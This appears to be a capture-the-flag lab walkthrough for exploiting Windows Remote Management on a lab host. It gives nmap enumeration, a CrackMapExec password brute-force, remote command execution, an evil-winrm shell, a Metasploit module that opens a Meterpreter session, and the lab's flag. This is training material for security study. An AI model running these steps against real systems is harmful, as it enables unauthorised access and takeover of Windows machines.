🔬WinRM

Lab 1

🔬 WinRM: Exploitation with Metasploit
Target IP: 10.4.30.175
WinRM exploitation
Dictionaries to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.30.175

nmap --top-ports 7000 10.4.30.175

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

nmap -sV -p 5985 10.4.30.175

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

CrackMapExec Brute-force

Use crackmapexec tool to confirm WinRM is running on port 5985

crackmapexec

crackmapexec winrm 10.4.30.175 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Execute specific Windows commands

crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "whoami"
crackmapexec winrm 10.4.30.175 -u administrator -p tinkerbell -x "systeminfo"

evil-WinRM Shell

Get a command shell session using evil-winrm tool

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.4.30.175

Meterpreter Session

msfconsole

search winrm_script
use exploit/windows/winrm/winrm_script_exec
set RHOSTS 10.4.30.175
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit

Reveal Flag: 🚩

3c716f95616eec677a7078f92657a230

Previous🔬RDP Next🔬Win Kernel Privesc

Last updated 2 years ago

hashtagLab 1

hashtagEnumeration

hashtagCrackMapExec Brute-force

hashtagevil-WinRM Shell

hashtagMeterpreter Session

Lab 1

Enumeration

CrackMapExec Brute-force

evil-WinRM Shell

Meterpreter Session